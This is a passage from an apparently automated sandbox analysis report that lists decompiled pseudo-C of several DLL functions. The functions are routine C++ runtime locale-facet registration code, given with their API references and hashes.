					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CFC90
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFC9A
int.LIBCPMT ref: 6E1CFCB1

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFD29

Strings

`m(n, xrefs: 6E1CFCA5

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `m(n
API String ID: 651022567-2906296985
Opcode ID: c6e398d21dcad5fdc1656daa4d5f7623a870f09eae6716150e9c55dab0ee5082
Instruction ID: b592d4e4f577ea2be97231f66722a7ffe644ee2aabb88268f3db0a42384b1074
Opcode Fuzzy Hash: c6e398d21dcad5fdc1656daa4d5f7623a870f09eae6716150e9c55dab0ee5082
Instruction Fuzzy Hash: 7A1136759105288BCF01EBE4C854AFEB37ABFA5B14F240808E420E7290DF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E1DBB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t110 - 0x14, 0);
				_t105 =  *0x6e286e40;
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1A161C(0x6e286e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E1C66BA(_t110 - 0x14);
					return E6E1E0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E1DC229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t110 - 0x20);
							E6E1E3D74(_t110 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t102, _t105, 0x14);
							E6E1C6653(_t110 - 0x14, 0);
							_t106 =  *0x6e286e44;
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1A161C(0x6e286e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E1C66BA(_t110 - 0x14);
								return E6E1E0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E1DC295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1A1438(_t93);
										E6E1E3D74(_t110 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e22851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e22c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E1DD028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E1E0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E1C6FD3(__eflags, _t103);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e286e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E1C6FD3(__eflags, _t102);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e286e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DBB37
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBB41
int.LIBCPMT ref: 6E1DBB58

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DBB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBBD0

Strings

n(n, xrefs: 6E1DBB4C

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: n(n
API String ID: 651022567-879260925
Opcode ID: 20b534616767b8541c257098ce39e390a9a0d517e7720a9dc255a75f9fb32eb6
Instruction ID: d32b9b098d6a86a3a02ef855666e18e5029482bf4c89756e12b723f6b8355137
Opcode Fuzzy Hash: 20b534616767b8541c257098ce39e390a9a0d517e7720a9dc255a75f9fb32eb6
Instruction Fuzzy Hash: 69112075D106288BCF01EBE4C854EFEB77ABF94714F140908E020AB290DFB49A88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E1DBBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t66 - 0x14, 0);
				_t63 =  *0x6e286e44;
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1A161C(0x6e286e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1A171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E1C66BA(_t66 - 0x14);
					return E6E1E0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E1DC295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1A1438(_t55);
							E6E1E3D74(_t66 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e22851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e22c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E1DD028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E1E0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E1C6FD3(__eflags, _t61);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e286e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DBBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBBE7
int.LIBCPMT ref: 6E1DBBFE

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DBC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBC76

Strings

$n(n, xrefs: 6E1DBBF2

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $n(n
API String ID: 651022567-3138053034
Opcode ID: 03595ad1a0a750e85e2efacf00cc89d91948e25a65af924a62b0a974ae8d84df
Instruction ID: 8c3549ca1929aff912c114db40eafea3d56b75bd14fbf5132257b1863471513e
Opcode Fuzzy Hash: 03595ad1a0a750e85e2efacf00cc89d91948e25a65af924a62b0a974ae8d84df
Instruction Fuzzy Hash: 08113675910518CBCF01DBE4C854EFEB77ABF94704F140908E121AB290DF749D89E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t330 - 0x14, 0);
				_t315 =  *0x6e286db0;
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1A161C(0x6e286d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E1C66BA(_t330 - 0x14);
					return E6E1E0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E1D13A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t330 - 0x20);
							E6E1E3D74(_t330 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t307, _t315, 0x14);
							E6E1C6653(_t330 - 0x14, 0);
							_t316 =  *0x6e286ddc;
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1A161C(0x6e286d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E1C66BA(_t330 - 0x14);
								return E6E1E0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E1D1409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t330 - 0x20);
										E6E1E3D74(_t330 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t234, _t308, _t316, 0x14);
										E6E1C6653(_t330 - 0x14, 0);
										_t317 =  *0x6e286de0;
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1A161C(0x6e286d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E1C66BA(_t330 - 0x14);
											return E6E1E0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E1D1471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t330 - 0x20);
													E6E1E3D74(_t330 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t234, _t309, _t317, 0x14);
													E6E1C6653(_t330 - 0x14, 0);
													_t318 =  *0x6e286dfc;
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1A161C(0x6e286da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E1C66BA(_t330 - 0x14);
														return E6E1E0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E1D14EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t330 - 0x20);
																E6E1E3D74(_t330 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t234, _t310, _t318, 0x14);
																E6E1C6653(_t330 - 0x14, 0);
																_t319 =  *0x6e286dcc;
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1A161C(0x6e286d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E1C66BA(_t330 - 0x14);
																	return E6E1E0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E1D1558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t330 - 0x20);
																			E6E1E3D74(_t330 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t234, _t311, _t319, 0x14);
																			E6E1C6653(_t330 - 0x14, 0);
																			_t320 =  *0x6e286e00;
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1A161C(0x6e286dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E1C66BA(_t330 - 0x14);
																				return E6E1E0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E1D15C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t330 - 0x20);
																						E6E1E3D74(_t330 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t234, _t312, _t320, 0x14);
																						E6E1C6653(_t330 - 0x14, 0);
																						_t321 =  *0x6e286dd0;
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1A161C(0x6e286d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E1C66BA(_t330 - 0x14);
																							return E6E1E0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E1D162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1A1438(_t283);
																									E6E1E3D74(_t330 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e22851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e22c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E1D542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E1E0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E1C6FD3(__eflags, _t313);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e286dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E1C6FD3(__eflags, _t312);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e286e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E1C6FD3(__eflags, _t311);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e286dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E1C6FD3(__eflags, _t310);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e286dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E1C6FD3(__eflags, _t309);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e286de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E1C6FD3(__eflags, _t308);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e286ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E1C6FD3(__eflags, _t307);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e286db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF8B6
int.LIBCPMT ref: 6E1CF8CD

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF907
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF927
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF945

Strings

dm(n, xrefs: 6E1CF8C1

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dm(n
API String ID: 651022567-576193998
Opcode ID: df7f38069b0eccad2fadbbe40d1cebab3c9c75f98e7d10f049a9816b1f1c837b
Instruction ID: 2d31d974f9024413aea7b2dc93d21ea6cd48075df04141dc2f3f58cfbfe5e24a
Opcode Fuzzy Hash: df7f38069b0eccad2fadbbe40d1cebab3c9c75f98e7d10f049a9816b1f1c837b
Instruction Fuzzy Hash: F5113AB59105199BCF01DBE4C854AFEB3BAAF64B14F240408E120E7290CF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t594 - 0x14, 0);
				_t567 =  *0x6e286dc0;
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6E1A161C(0x6e286d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6E1C66BA(_t594 - 0x14);
					return E6E1E0075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6E1D10BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t594 - 0x20);
							E6E1E3D74(_t594 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t553, _t567, 0x14);
							E6E1C6653(_t594 - 0x14, 0);
							_t568 =  *0x6e286df8;
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6E1A161C(0x6e286da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6E1C66BA(_t594 - 0x14);
								return E6E1E0075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6E1D1127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t594 - 0x20);
										E6E1E3D74(_t594 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t420, _t554, _t568, 0x14);
										E6E1C6653(_t594 - 0x14, 0);
										_t569 =  *0x6e286df4;
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6E1A161C(0x6e286da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6E1C66BA(_t594 - 0x14);
											return E6E1E0075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6E1D11AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t594 - 0x20);
													E6E1E3D74(_t594 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t420, _t555, _t569, 0x14);
													E6E1C6653(_t594 - 0x14, 0);
													_t570 =  *0x6e286dc8;
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6E1A161C(0x6e286d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6E1C66BA(_t594 - 0x14);
														return E6E1E0075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6E1D1230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t594 - 0x20);
																E6E1E3D74(_t594 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t420, _t556, _t570, 0x14);
																E6E1C6653(_t594 - 0x14, 0);
																_t571 =  *0x6e286dc4;
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6E1A161C(0x6e286d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6E1C66BA(_t594 - 0x14);
																	return E6E1E0075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6E1D12B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t594 - 0x20);
																			E6E1E3D74(_t594 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t420, _t557, _t571, 0x14);
																			E6E1C6653(_t594 - 0x14, 0);
																			_t572 =  *0x6e286dd8;
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6E1A161C(0x6e286d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6E1A171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6E1C66BA(_t594 - 0x14);
																				return E6E1E0075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6E1D1339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t594 - 0x20);
																						E6E1E3D74(_t594 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t420, _t558, _t572, 0x14);
																						E6E1C6653(_t594 - 0x14, 0);
																						_t573 =  *0x6e286db0;
